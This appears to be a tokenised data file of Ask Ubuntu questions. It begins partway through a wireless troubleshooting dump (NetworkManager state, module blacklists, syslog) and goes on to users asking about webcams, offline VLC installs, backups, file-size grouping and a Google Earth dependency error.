# # # # # route # # # # # kernel ip routing table destination gateway genmask flags metric ref use iface # # # # # resolv.conf # # # # # # # # # # nm-tool # # # # # networkmanager tool state : disconnected - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : < mac address removed > capabilities : carrier detect : yes wired properties carrier : off # # # # # networkmanager.state # # # # # [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true # # # # # networkmanager.conf # # # # # [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq [ ifupdown ] managed=false # # # # # iwlist # # # # # # # # # # iwlist channel # # # # # # # # # # lsmod # # # # # # # # # # modinfo # # # # # # # # # # modules # # # # # lp rtc # # # # # blacklist # # # # # [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac [ /etc/modprobe.d/bumblebee.conf ] blacklist nouveau blacklist nvidia blacklist nvidia-current blacklist nvidia-current-updates blacklist nvidia-304 blacklist nvidia-304-updates blacklist nvidia-experimental-304 blacklist nvidia-310 blacklist nvidia-310-updates blacklist nvidia-experimental-310 blacklist nvidia-313 blacklist nvidia-313-updates blacklist nvidia-experimental-313 blacklist nvidia-319 blacklist nvidia-319-updates blacklist nvidia-experimental-319 blacklist nvidia-325 blacklist nvidia-325-updates blacklist nvidia-experimental-325 blacklist nvidia-331 blacklist nvidia-331-updates blacklist nvidia-experimental-331 # # # # # udev rules # # # # # # pci device 0x10ec:0x8168 ( r8169 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # usb device 0x:0x ( rtl8192cu ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 '' # # # # # dmesg # # # # # # # # # # # # # # # wireless info end # # # # # # # # # # # # may 20 13:01:59 kaspar-all-series anacron [ 847 ] : job `cron.daily ' terminated may 20 13:02:00 kaspar-all-series dbus [ 618 ] : [ system ] activating service name='com.ubuntu.screenresolution.mechanism ' ( using servicehelper ) may 20 13:02:00 kaspar-all-series dbus [ 618 ] : [ system ] successfully activated service 'com.ubuntu.screenresolution.mechanism' may 20 13:04:27 kaspar-all-series dbus [ 618 ] : [ system ] activating service name='org.freedesktop.hostname1 ' ( using servicehelper ) may 20 13:04:27 kaspar-all-series dbus [ 618 ] : [ system ] successfully activated service 'org.freedesktop.hostname1' may 20 13:04:42 kaspar-all-series aptdaemon : info : updatecache ( ) was called may 20 13:04:42 kaspar-all-series aptdaemon.trans : info : queuing transaction /org/debian/apt/transaction/653acc3280a44adbbb0fb39b503c017c may 20 13:04:42 kaspar-all-series aptdaemon.worker : info : simulating trans : /org/debian/apt/transaction/653acc3280a44adbbb0fb39b503c017c may 20 13:04:42 kaspar-all-series aptdaemon.worker : info : processing transaction /org/debian/apt/transaction/653acc3280a44adbbb0fb39b503c017c may 20 13:04:43 kaspar-all-series aptdaemon.worker : info : updating cache may 20 13:05:02 kaspar-all-series aptdaemon.worker : info : finished transaction /org/debian/apt/transaction/653acc3280a44adbbb0fb39b503c017c may 20 13:05:32 kaspar-all-series anacron [ 847 ] : job `cron.weekly ' started may 20 13:05:32 kaspar-all-series anacron [ 3813 ] : updated timestamp for job `cron.weekly ' to 2014-05-20 may 20 13:05:45 kaspar-all-series aptdaemon : info : commitpackages ( ) was called : dbus.array ( [ dbus.string ( '' ) ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ dbus.string ( '' ) ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ dbus.string ( '' ) ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ dbus.string ( '' ) ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ dbus.string ( 'account-plugin-aim ' ) , dbus.string ( 'account-plugin-jabber ' ) , dbus.string ( 'account-plugin-salut ' ) , dbus.string ( 'account-plugin-yahoo ' ) , dbus.string ( 'app-install-data ' ) , dbus.string ( 'bash ' ) , dbus.string ( 'cups-browsed ' ) , dbus.string ( 'cups-filters ' ) , dbus.string ( 'cups-filters-core-drivers ' ) , dbus.string ( 'dpkg ' ) , dbus.string ( 'empathy ' ) , dbus.string ( 'empathy-common ' ) , dbus.string ( 'firefox ' ) , dbus.string ( 'firefox-locale-en ' ) , dbus.string ( 'firefox-locale-et ' ) , dbus.string ( 'flashplugin-installer ' ) , dbus.string ( 'gdb ' ) , dbus.string ( 'gettext ' ) , dbus.string ( 'gettext-base ' ) , dbus.string ( 'ghostscript ' ) , dbus.string ( 'ghostscript-x ' ) , dbus.string ( 'gir1.2-freedesktop ' ) , dbus.string ( 'gir1.2-glib-2.0 ' ) , dbus.string ( 'gir1.2-gudev-1.0 ' ) , dbus.string ( 'gir1.2-rb-3.0 ' ) , dbus.string ( 'gnome-calculator ' ) , dbus.string ( 'gnome-control-center-shared-data ' ) , dbus.string ( 'icedtea-7-jre-jamvm ' ) , dbus.string ( 'ifupdown ' ) , dbus.string ( 'initramfs-tools ' ) , dbus.string ( 'initramfs-tools-bin ' ) , dbus.string ( 'iputils-arping ' ) , dbus.string ( 'iputils-ping ' ) , dbus.string ( 'iputils-tracepath ' ) , dbus.string ( 'libasprintf-dev ' ) , dbus.string ( 'libasprintf0c2 ' ) , dbus.string ( 'libavcodec54 ' ) , dbus.string ( 'libavformat54 ' ) , dbus.string ( 'libavutil52 ' ) , dbus.string ( 'libcupsfilters1 ' ) , dbus.string ( 'libdpkg-perl ' ) , dbus.string ( 'libdrm-intel1 ' ) , dbus.string ( 'libdrm-intel1 : i386 ' ) , dbus.string ( 'libdrm-nouveau2 ' ) , dbus.string ( 'libdrm-nouveau2 : i386 ' ) , dbus.string ( 'libdrm-radeon1 ' ) , dbus.string ( 'libdrm-radeon1 : i386 ' ) , dbus.string ( 'libdrm2 ' ) , dbus.string ( 'libdrm2 : i386 ' ) , dbus.string ( 'libegl1-mesa ' ) , dbus.string ( 'libegl1-mesa-drivers ' ) , dbus.string ( 'libelf1 ' ) , dbus.string ( 'libelf1 : i386 ' ) , dbus.string ( 'libfontembed1 ' ) , dbus.string ( 'libfreetype6 ' ) , dbus.string ( 'libfreetype6 : i386 ' ) , dbus.string ( 'libgail-common ' ) , dbus.string ( 'libgail18 ' ) , dbus.string ( 'libgbm1 ' ) , dbus.string ( 'libgettextpo-dev ' ) , dbus.string ( 'libgettextpo0 ' ) , dbus.string ( 'libgexiv2-2 ' ) , dbus.string ( 'libgirepository-1.0-1 ' ) , dbus.string ( 'libgl1-mesa-dri ' ) , dbus.string ( 'libgl1-mesa-dri : i386 ' ) , dbus.string ( 'libgl1-mesa-glx ' ) , dbus.string ( 'libgl1-mesa-glx : i386 ' ) , dbus.string ( 'libglamor0 ' ) , dbus.string ( 'libglapi-mesa ' ) , dbus.string ( 'libglapi-mesa : i386 ' ) , dbus.string ( 'libgles2-mesa ' ) , dbus.string ( 'libgnome-control-center1 ' ) , dbus.string ( 'libgs9 ' ) , dbus.string ( 'libgs9-common ' ) , dbus.string ( 'libgtk2.0-0 ' ) , dbus.string ( 'libgtk2.0-bin ' ) , dbus.string ( 'libgtk2.0-common ' ) , dbus.string ( 'libgudev-1.0-0 ' ) , dbus.string ( 'libido3-0.1-0 ' ) , dbus.string ( 'libjbig0 ' ) , dbus.string ( 'libjbig0 : i386 ' ) , dbus.string ( 'liblightdm-gobject-1-0 ' ) , dbus.string ( 'libmysqlclient18 : i386 ' ) , dbus.string ( 'libopenvg1-mesa ' ) , dbus.string ( 'libpam-systemd ' ) , dbus.string ( 'librhythmbox-core8 ' ) , dbus.string ( 'libsdl1.2debian ' ) , dbus.string ( 'libselinux1 ' ) , dbus.string ( 'libselinux1 : i386 ' ) , dbus.string ( 'libsmbclient ' ) , dbus.string ( 'libssl1.0.0 ' ) , dbus.string ( 'libssl1.0.0 : i386 ' ) , dbus.string ( 'libswscale2 ' ) , dbus.string ( 'libsystemd-daemon0 ' ) , dbus.string ( 'libsystemd-journal0 ' ) , dbus.string ( 'libsystemd-login0 ' ) , dbus.string ( 'libtiff5 ' ) , dbus.string ( 'libtiff5 : i386 ' ) , dbus.string ( 'libudev1 ' ) , dbus.string ( 'libudev1 : i386 ' ) , dbus.string ( 'libunity-core-6.0-9 ' ) , dbus.string ( 'libvlc5 ' ) , dbus.string ( 'libvlccore7 ' ) , dbus.string ( 'libwayland-egl1-mesa ' ) , dbus.string ( 'libwbclient0 ' ) , dbus.string ( 'libxatracker2 ' ) , dbus.string ( 'libxfont1 ' ) , dbus.string ( 'libxml2 ' ) , dbus.string ( 'libxml2 : i386 ' ) , dbus.string ( 'lightdm ' ) , dbus.string ( 'linux-firmware ' ) , dbus.string ( 'linux-generic ' ) , dbus.string ( 'linux-headers-3.13.0-24 ' ) , dbus.string ( 'linux-headers-3.13.0-24-generic ' ) , dbus.string ( 'linux-headers-generic ' ) , dbus.string ( 'linux-image-3.13.0-24-generic ' ) , dbus.string ( 'linux-image-extra-3.13.0-24-generic ' ) , dbus.string ( 'linux-image-generic ' ) , dbus.string ( 'linux-libc-dev ' ) , dbus.string ( 'ltrace ' ) , dbus.string ( 'mcp-account-manager-uoa ' ) , dbus.string ( 'mysql-common ' ) , dbus.string ( 'nautilus-sendto-empathy ' ) , dbus.string ( 'nvidia-337 ' ) , dbus.string ( 'nvidia-settings ' ) , dbus.string ( 'openjdk-7-jre ' ) , dbus.string ( 'openjdk-7-jre-headless ' ) , dbus.string ( 'openssl ' ) , dbus.string ( 'patch ' ) , dbus.string ( 'python-cupshelpers ' ) , dbus.string ( 'python-libxml2 ' ) , dbus.string ( 'python-samba ' ) , dbus.string ( 'python3-software-properties ' ) , dbus.string ( 'python3-update-manager ' ) , dbus.string ( 'rhythmbox ' ) , dbus.string ( 'rhythmbox-data ' ) , dbus.string ( 'rhythmbox-mozilla ' ) , dbus.string ( 'rhythmbox-plugin-cdrecorder ' ) , dbus.string ( 'rhythmbox-plugin-magnatune ' ) , dbus.string ( 'rhythmbox-plugin-zeitgeist ' ) , dbus.string ( 'rhythmbox-plugins ' ) , dbus.string ( 'rsync ' ) , dbus.string ( 'samba-common ' ) , dbus.string ( 'samba-common-bin ' ) , dbus.string ( 'samba-libs ' ) , dbus.string ( 'smbclient ' ) , dbus.string ( 'software-center ' ) , dbus.string ( 'software-properties-common ' ) , dbus.string ( 'software-properties-gtk ' ) , dbus.string ( 'steam-launcher ' ) , dbus.string ( 'system-config-printer-common ' ) , dbus.string ( 'system-config-printer-gnome ' ) , dbus.string ( 'system-config-printer-udev ' ) , dbus.string ( 'systemd-services ' ) , dbus.string ( 'thunderbird ' ) , dbus.string ( 'thunderbird-gnome-support ' ) , dbus.string ( 'thunderbird-locale-en ' ) , dbus.string ( 'thunderbird-locale-en-gb ' ) , dbus.string ( 'thunderbird-locale-en-us ' ) , dbus.string ( 'thunderbird-locale-et ' ) , dbus.string ( 'tzdata ' ) , dbus.string ( 'tzdata-java ' ) , dbus.string ( 'udev ' ) , dbus.string ( 'unity ' ) , dbus.string ( 'unity-greeter ' ) , dbus.string ( 'unity-services ' ) , dbus.string ( 'update-manager ' ) , dbus.string ( 'update-manager-core ' ) , dbus.string ( 'vlc ' ) , dbus.string ( 'vlc-data ' ) , dbus.string ( 'vlc-nox ' ) , dbus.string ( 'vlc-plugin-notify ' ) , dbus.string ( 'vlc-plugin-pulse ' ) , dbus.string ( 'xserver-xorg-video-ati ' ) , dbus.string ( 'xserver-xorg-video-glamoregl ' ) , dbus.string ( 'xserver-xorg-video-intel ' ) , dbus.string ( 'xserver-xorg-video-nouveau ' ) , dbus.string ( 'xserver-xorg-video-radeon ' ) ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ dbus.string ( '' ) ] , signature=dbus.signature ( 's ' ) ) may 20 13:05:45 kaspar-all-series aptdaemon.trans : info : queuing transaction /org/debian/apt/transaction/cc1925d70e1446e787796b1de148b4f5 may 20 13:05:45 kaspar-all-series aptdaemon.worker : info : simulating trans : /org/debian/apt/transaction/cc1925d70e1446e787796b1de148b4f5 may 20 13:05:45 kaspar-all-series aptdaemon.worker : info : committing packages : dbus.array ( [ ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ dbus.string ( 'account-plugin-aim ' ) , dbus.string ( 'account-plugin-jabber ' ) , dbus.string ( 'account-plugin-salut ' ) , dbus.string ( 'account-plugin-yahoo ' ) , dbus.string ( 'app-install-data ' ) , dbus.string ( 'bash ' ) , dbus.string ( 'cups-browsed ' ) , dbus.string ( 'cups-filters ' ) , dbus.string ( 'cups-filters-core-drivers ' ) , dbus.string ( 'dpkg ' ) , dbus.string ( 'empathy ' ) , dbus.string ( 'empathy-common ' ) , dbus.string ( 'firefox ' ) , dbus.string ( 'firefox-locale-en ' ) , dbus.string ( 'firefox-locale-et ' ) , dbus.string ( 'flashplugin-installer ' ) , dbus.string ( 'gdb ' ) , dbus.string ( 'gettext ' ) , dbus.string ( 'gettext-base ' ) , dbus.string ( 'ghostscript ' ) , dbus.string ( 'ghostscript-x ' ) , dbus.string ( 'gir1.2-freedesktop ' ) , dbus.string ( 'gir1.2-glib-2.0 ' ) , dbus.string ( 'gir1.2-gudev-1.0 ' ) , dbus.string ( 'gir1.2-rb-3.0 ' ) , dbus.string ( 'gnome-calculator ' ) , dbus.string ( 'gnome-control-center-shared-data ' ) , dbus.string ( 'icedtea-7-jre-jamvm ' ) , dbus.string ( 'ifupdown ' ) , dbus.string ( 'initramfs-tools ' ) , dbus.string ( 'initramfs-tools-bin ' ) , dbus.string ( 'iputils-arping ' ) , dbus.string ( 'iputils-ping ' ) , dbus.string ( 'iputils-tracepath ' ) , dbus.string ( 'libasprintf-dev ' ) , dbus.string ( 'libasprintf0c2 ' ) , dbus.string ( 'libavcodec54 ' ) , dbus.string ( 'libavformat54 ' ) , dbus.string ( 'libavutil52 ' ) , dbus.string ( 'libcupsfilters1 ' ) , dbus.string ( 'libdpkg-perl ' ) , dbus.string ( 'libdrm-intel1 ' ) , dbus.string ( 'libdrm-intel1 : i386 ' ) , dbus.string ( 'libdrm-nouveau2 ' ) , dbus.string ( 'libdrm-nouveau2 : i386 ' ) , dbus.string ( 'libdrm-radeon1 ' ) , dbus.string ( 'libdrm-radeon1 : i386 ' ) , dbus.string ( 'libdrm2 ' ) , dbus.string ( 'libdrm2 : i386 ' ) , dbus.string ( 'libegl1-mesa ' ) , dbus.string ( 'libegl1-mesa-drivers ' ) , dbus.string ( 'libelf1 ' ) , dbus.string ( 'libelf1 : i386 ' ) , dbus.string ( 'libfontembed1 ' ) , dbus.string ( 'libfreetype6 ' ) , dbus.string ( 'libfreetype6 : i386 ' ) , dbus.string ( 'libgail-common ' ) , dbus.string ( 'libgail18 ' ) , dbus.string ( 'libgbm1 ' ) , dbus.string ( 'libgettextpo-dev ' ) , dbus.string ( 'libgettextpo0 ' ) , dbus.string ( 'libgexiv2-2 ' ) , dbus.string ( 'libgirepository-1.0-1 ' ) , dbus.string ( 'libgl1-mesa-dri ' ) , dbus.string ( 'libgl1-mesa-dri : i386 ' ) , dbus.string ( 'libgl1-mesa-glx ' ) , dbus.string ( 'libgl1-mesa-glx : i386 ' ) , dbus.string ( 'libglamor0 ' ) , dbus.string ( 'libglapi-mesa ' ) , dbus.string ( 'libglapi-mesa : i386 ' ) , dbus.string ( 'libgles2-mesa ' ) , dbus.string ( 'libgnome-control-center1 ' ) , dbus.string ( 'libgs9 ' ) , dbus.string ( 'libgs9-common ' ) , dbus.string ( 'libgtk2.0-0 ' ) , dbus.string ( 'libgtk2.0-bin ' ) , dbus.string ( 'libgtk2.0-common ' ) , dbus.string ( 'libgudev-1.0-0 ' ) , dbus.string ( 'libido3-0.1-0 ' ) , dbus.string ( 'libjbig0 ' ) , dbus.string ( 'libjbig0 : i386 ' ) , dbus.string ( 'liblightdm-gobject-1-0 ' ) , dbus.string ( 'libmysqlclient18 : i386 ' ) , dbus.string ( 'libopenvg1-mesa ' ) , dbus.string ( 'libpam-systemd ' ) , dbus.string ( 'librhythmbox-core8 ' ) , dbus.string ( 'libsdl1.2debian ' ) , dbus.string ( 'libselinux1 ' ) , dbus.string ( 'libselinux1 : i386 ' ) , dbus.string ( 'libsmbclient ' ) , dbus.string ( 'libssl1.0.0 ' ) , dbus.string ( 'libssl1.0.0 : i386 ' ) , dbus.string ( 'libswscale2 ' ) , dbus.string ( 'libsystemd-daemon0 ' ) , dbus.string ( 'libsystemd-journal0 ' ) , dbus.string ( 'libsystemd-login0 ' ) , dbus.string ( 'libtiff5 ' ) , dbus.string ( 'libtiff5 : i386 ' ) , dbus.string ( 'libudev1 ' ) , dbus.string ( 'libudev1 : i386 ' ) , dbus.string ( 'libunity-core-6.0-9 ' ) , dbus.string ( 'libvlc5 ' ) , dbus.string ( 'libvlccore7 ' ) , dbus.string ( 'libwayland-egl1-mesa ' ) , dbus.string ( 'libwbclient0 ' ) , dbus.string ( 'libxatracker2 ' ) , dbus.string ( 'libxfont1 ' ) , dbus.string ( 'libxml2 ' ) , dbus.string ( 'libxml2 : i386 ' ) , dbus.string ( 'lightdm ' ) , dbus.string ( 'linux-firmware ' ) , dbus.string ( 'linux-generic ' ) , dbus.string ( 'linux-headers-3.13.0-24 ' ) , dbus.string ( 'linux-headers-3.13.0-24-generic ' ) , dbus.string ( 'linux-headers-generic ' ) , dbus.string ( 'linux-image-3.13.0-24-generic ' ) , dbus.string ( 'linux-image-extra-3.13.0-24-generic ' ) , dbus.string ( 'linux-image-generic ' ) , dbus.string ( 'linux-libc-dev ' ) , dbus.string ( 'ltrace ' ) , dbus.string ( 'mcp-account-manager-uoa ' ) , dbus.string ( 'mysql-common ' ) , dbus.string ( 'nautilus-sendto-empathy ' ) , dbus.string ( 'nvidia-337 ' ) , dbus.string ( 'nvidia-settings ' ) , dbus.string ( 'openjdk-7-jre ' ) , dbus.string ( 'openjdk-7-jre-headless ' ) , dbus.string ( 'openssl ' ) , dbus.string ( 'patch ' ) , dbus.string ( 'python-cupshelpers ' ) , dbus.string ( 'python-libxml2 ' ) , dbus.string ( 'python-samba ' ) , dbus.string ( 'python3-software-properties ' ) , dbus.string ( 'python3-update-manager ' ) , dbus.string ( 'rhythmbox ' ) , dbus.string ( 'rhythmbox-data ' ) , dbus.string ( 'rhythmbox-mozilla ' ) , dbus.string ( 'rhythmbox-plugin-cdrecorder ' ) , dbus.string ( 'rhythmbox-plugin-magnatune ' ) , dbus.string ( 'rhythmbox-plugin-zeitgeist ' ) , dbus.string ( 'rhythmbox-plugins ' ) , dbus.string ( 'rsync ' ) , dbus.string ( 'samba-common ' ) , dbus.string ( 'samba-common-bin ' ) , dbus.string ( 'samba-libs ' ) , dbus.string ( 'smbclient ' ) , dbus.string ( 'software-center ' ) , dbus.string ( 'software-properties-common ' ) , dbus.string ( 'software-properties-gtk ' ) , dbus.string ( 'steam-launcher ' ) , dbus.string ( 'system-config-printer-common ' ) , dbus.string ( 'system-config-printer-gnome ' ) , dbus.string ( 'system-config-printer-udev ' ) , dbus.string ( 'systemd-services ' ) , dbus.string ( 'thunderbird ' ) , dbus.string ( 'thunderbird-gnome-support ' ) , dbus.string ( 'thunderbird-locale-en ' ) , dbus.string ( 'thunderbird-locale-en-gb ' ) , dbus.string ( 'thunderbird-locale-en-us ' ) , dbus.string ( 'thunderbird-locale-et ' ) , dbus.string ( 'tzdata ' ) , dbus.string ( 'tzdata-java ' ) , dbus.string ( 'udev ' ) , dbus.string ( 'unity ' ) , dbus.string ( 'unity-greeter ' ) , dbus.string ( 'unity-services ' ) , dbus.string ( 'update-manager ' ) , dbus.string ( 'update-manager-core ' ) , dbus.string ( 'vlc ' ) , dbus.string ( 'vlc-data ' ) , dbus.string ( 'vlc-nox ' ) , dbus.string ( 'vlc-plugin-notify ' ) , dbus.string ( 'vlc-plugin-pulse ' ) , dbus.string ( 'xserver-xorg-video-ati ' ) , dbus.string ( 'xserver-xorg-video-glamoregl ' ) , dbus.string ( 'xserver-xorg-video-intel ' ) , dbus.string ( 'xserver-xorg-video-nouveau ' ) , dbus.string ( 'xserver-xorg-video-radeon ' ) ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ ] , signature=dbus.signature ( 's ' ) ) may 20 13:05:46 kaspar-all-series aptdaemon.worker : info : processing transaction /org/debian/apt/transaction/cc1925d70e1446e787796b1de148b4f5 may 20 13:06:17 kaspar-all-series anacron [ 847 ] : job `cron.weekly ' terminated may 20 13:06:41 kaspar-all-series aptdaemon.trans : info : cancelling transaction /org/debian/apt/transaction/cc1925d70e1446e787796b1de148b4f5 may 20 13:06:42 kaspar-all-series aptdaemon.worker : info : finished transaction /org/debian/apt/transaction/cc1925d70e1446e787796b1de148b4f5 may 20 13:06:51 kaspar-all-series networkmanager [ 932 ] : < info > ( wlan0 ) : device state change : activated - > unavailable ( reason 'none ' ) [ 100 20 0 ] may 20 13:06:51 kaspar-all-series networkmanager [ 932 ] : < info > ( wlan0 ) : deactivating device ( reason 'none ' ) [ 0 ] may 20 13:06:51 kaspar-all-series networkmanager [ 932 ] : < info > ( wlan0 ) : canceled dhcp transaction , dhcp client pid 1172 may 20 13:06:51 kaspar-all-series avahi-daemon [ 733 ] : withdrawing address record for fe80 : :a2f3 : c1ff : fe1c : a4a8 on wlan0 . may 20 13:06:51 kaspar-all-series avahi-daemon [ 733 ] : leaving mdns multicast group on interface wlan0.ipv6 with address fe80 : :a2f3 : c1ff : fe1c : a4a8 . may 20 13:06:51 kaspar-all-series avahi-daemon [ 733 ] : interface wlan0.ipv6 no longer relevant for mdns . may 20 13:06:51 kaspar-all-series kernel : [ 691.260807 ] wlan0 : deauthenticating from 00:0e:2e:6e : f4 : ca by local choice ( reason=3 ) may 20 13:06:50 kaspar-all-series wpa_supplicant [ 1051 ] : message repeated 7 times : [ wlan0 : ctrl-event-scan-started ] may 20 13:06:51 kaspar-all-series wpa_supplicant [ 1051 ] : wlan0 : ctrl-event-disconnected bssid=00:0e:2e:6e : f4 : ca reason=3 locally_generated=1 may 20 13:06:51 kaspar-all-series avahi-daemon [ 733 ] : withdrawing address record for 192.168.2.103 on wlan0 . may 20 13:06:51 kaspar-all-series avahi-daemon [ 733 ] : leaving mdns multicast group on interface wlan0.ipv4 with address 192.168.2.103 . may 20 13:06:51 kaspar-all-series networkmanager [ 932 ] : < warn > dns : plugin dnsmasq update failed may 20 13:06:51 kaspar-all-series networkmanager [ 932 ] : < info > removing dns information from /sbin/resolvconf may 20 13:06:51 kaspar-all-series dnsmasq [ 1490 ] : setting upstream servers from dbus may 20 13:06:51 kaspar-all-series kernel : [ 691.274986 ] cfg80211 : calling crda to update world regulatory domain may 20 13:06:51 kaspar-all-series avahi-daemon [ 733 ] : interface wlan0.ipv4 no longer relevant for mdns . may 20 13:06:51 kaspar-all-series whoopsie [ 1041 ] : offline may 20 13:06:51 kaspar-all-series kernel : [ 691.280262 ] cfg80211 : world regulatory domain updated : may 20 13:06:51 kaspar-all-series kernel : [ 691.280266 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) may 20 13:06:51 kaspar-all-series kernel : [ 691.280268 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 20 13:06:51 kaspar-all-series kernel : [ 691.280270 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 20 13:06:51 kaspar-all-series kernel : [ 691.280272 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) may 20 13:06:51 kaspar-all-series kernel : [ 691.280273 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 20 13:06:51 kaspar-all-series kernel : [ 691.280275 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 20 13:06:51 kaspar-all-series networkmanager [ 932 ] : < info > networkmanager state is now disconnected may 20 13:06:51 kaspar-all-series networkmanager [ 932 ] : < info > ( wlan0 ) : taking down device . may 20 13:06:51 kaspar-all-series dbus [ 618 ] : [ system ] activating service name='org.freedesktop.nm_dispatcher ' ( using servicehelper ) may 20 13:06:51 kaspar-all-series dbus [ 618 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' may 20 13:06:51 kaspar-all-series networkmanager [ 932 ] : < info > wifi hardware radio set disabled may 20 13:06:51 kaspar-all-series networkmanager [ 932 ] : < info > wifi now disabled by radio killswitch may 20 13:06:52 kaspar-all-series networkmanager [ 932 ] : < info > ( wlan0 ) : bringing up device . may 20 13:06:52 kaspar-all-series networkmanager [ 932 ] : < info > wifi hardware radio set enabled may 20 13:06:52 kaspar-all-series networkmanager [ 932 ] : < info > wifi now enabled by radio killswitch may 20 13:06:52 kaspar-all-series networkmanager [ 932 ] : < info > ( wlan0 ) : bringing up device . may 20 13:06:52 kaspar-all-series kernel : [ 692.773533 ] rtl8192cu : mac auto on okay ! may 20 13:06:52 kaspar-all-series kernel : [ 692.784108 ] rtl8192cu : tx queue select : 0x05 may 20 13:06:53 kaspar-all-series kernel : [ 693.140284 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready may 20 13:06:53 kaspar-all-series networkmanager [ 932 ] : < info > ( wlan0 ) supports 4 scan ssids may 20 13:06:53 kaspar-all-series networkmanager [ 932 ] : < info > ( wlan0 ) : supplicant interface state : starting - > ready may 20 13:06:53 kaspar-all-series networkmanager [ 932 ] : < info > ( wlan0 ) : device state change : unavailable - > disconnected ( reason 'supplicant-available ' ) [ 20 30 42 ] may 20 13:06:53 kaspar-all-series networkmanager [ 932 ] : < warn > trying to remove a non-existant call id . may 20 13:06:53 kaspar-all-series wpa_supplicant [ 1051 ] : wlan0 : ctrl-event-scan-started may 20 13:06:53 kaspar-all-series networkmanager [ 932 ] : < info > ( wlan0 ) : supplicant interface state : ready - > disconnected may 20 13:06:53 kaspar-all-series networkmanager [ 932 ] : < info > ( wlan0 ) supports 4 scan ssids may 20 13:06:53 kaspar-all-series networkmanager [ 932 ] : < info > auto-activating connection 'seened ' .
442965	how to fix colours in the software centre ?	the software centre on ubuntu 13.10 is showing up a colour scheme that renders the text hardly readable : apparently , it is mixing colours from the desktop theme with its own theme and the end result is somewhat of a blur . is there any way to fix it ?
442969	how can i install the webcam c170 drivers ubuntu 12.04	the logitech camera green light comes on and go 's back out , but does not load the application it self . please advise
442971	installing ubuntu now , or wait for 14.04 ?	so , i really like to try out ubuntu , because i would like to use something new on my computer . now , i have got a uefi based motherboard with secure boot enabled . ( an asus b85m-g ) but my question is , should i attemp to install ubuntu now ? or should i wait for the 14.04 ? thanks already for answsering ps : does my motherboard support ubuntu properly ?
442972	how do i install vlc on ubuntu without an internet connection	i do n't have internet on my one ubuntu computer and i am trying to install vlc . my plan was to download all the necessary files onto my laptop ( wich is running on windows ) , then on to a memory key , then copy the files from there onto my ubuntu computer . however , it does n't seem to be as easy as that . specifically i ca n't download the files for ubuntu onto my windows-running laptop . help please ! i have no idea what i 'm doing .
442975	udf can not be nested	i am a novice with security issues . i am trying to recover missing files with deja-vu backup and get the message `` udf can not be nested . '' this is not using command line , just the gui , as i have only the very basic novice level understand of using a shell . what can i do , if anything , to recover my missing files ? thank you . amy
442976	how can i group the files in a directory based on their file size	i have a directory where i am writing lots of files but i know each of them fall under one of the 3 pre-determined memory sizes based on what i write . any file i write may be either 300kb or 129.1mb or 251mb . now if there is any packet error in the incoming data , the files that i write will not fall under one of these buckets . since there will be so many files generated i will not be able to check the individual file size manually . hence i need a way by which i can group all files by its size so that most of the files will fall under the three category mentioned above and i can easily find the files that are bad . in short i want something like this : select file_names from folder and group by file_size . is it possible ? edit : it would be even better if anyone can give me a solution by which i can : select file_names from folder whose filesize not in [ 300kb,129.1mb,251mb ] . any ideas ?
442977	google earth installation problem	i have tried to install google earth as indicated here http : //ubuntuguide.org/wiki/ubuntu_saucy_maps_and_gps but now i have this problem : sudo dpkg -i googleearth_6.0.3.2197+1.0-1_amd64.deb selecting previously unselected package googleearth . ( reading database ... 275020 files and directories currently installed . ) unpacking googleearth ( from googleearth_6.0.3.2197+1.0-1_amd64.deb ) ... dpkg : dependency problems prevent configuration of googleearth : googleearth depends on ia32-libs-multiarch ; however : package ia32-libs-multiarch is not installed . dpkg : error processing googleearth ( -- install ) : dependency problems - leaving unconfigured processing triggers for mime-support ... processing triggers for shared-mime-info ... unknown media type in type 'all/all' unknown media type in type 'all/allfiles' unknown media type in type 'uri/mms' unknown media type in type 'uri/mmst' unknown media type in type 'uri/mmsu' unknown media type in type 'uri/pnm' unknown media type in type 'uri/rtspt' unknown media type in type 'uri/rtspu' processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... errors were encountered while processing : googleearth what shoul i do next ?
